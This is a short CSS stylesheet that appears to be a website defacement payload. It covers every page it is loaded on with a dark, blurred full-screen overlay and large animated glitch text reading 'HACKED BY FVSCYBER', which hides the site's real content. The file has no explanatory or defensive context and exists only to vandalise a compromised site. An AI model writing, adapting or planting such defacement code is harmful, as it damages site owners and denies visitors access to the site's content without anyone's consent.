         /* ===== Glitch Overlay + Center Text ===== */

/* Overlay noise + scanline */
body::after {
  content: "";
  position: fixed;
  inset: 0;
  animation: noiseMove 0.5s steps(2) infinite;
  z-index: 99998;
  pointer-events: none;
  background-color: #0000009e;
  backdrop-filter: blur(30px);
}

/* Glitch text */
body::before {
  display: flex;
  justify-content: center;
  align-items: center;
  content: "HACKED BY FVSCYBER";
  position: fixed;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  font-family: monospace;
  font-size: 4vw;
  font-weight: bold;
  color: white;
  text-shadow: 2px 0 red, -2px 0 cyan;
  animation: glitchText .5s infinite;
  z-index: 99999;
  pointer-events: none;
  width: 100dvw;
  height: 100dvh;
  
}

/* Glitch distort overlay */
@keyframes noiseMove {
  0%, 100% { background-position: 0 0, 0 0; }
  50% { background-position: 5px 5px, -5px -5px; }
}

@keyframes glitchText {
  0% { text-shadow: 2px 0 red, -2px 0 cyan; }
  20% { text-shadow: -2px 0 red, 2px 0 cyan; transform: translate(-50%, -50%) skew(1deg); }
  40% { text-shadow: 2px 0 blue, -2px 0 lime; transform: translate(-50%, -50%) skew(-1deg); }
  60% { text-shadow: -2px 0 magenta, 2px 0 yellow; transform: translate(-50%, -50%) skew(2deg); }
  80% { text-shadow: 2px 0 red, -2px 0 cyan; transform: translate(-50%, -50%) skew(-2deg); }
  100% { text-shadow: 2px 0 red, -2px 0 cyan; transform: translate(-50%, -50%) skew(0deg); }
}
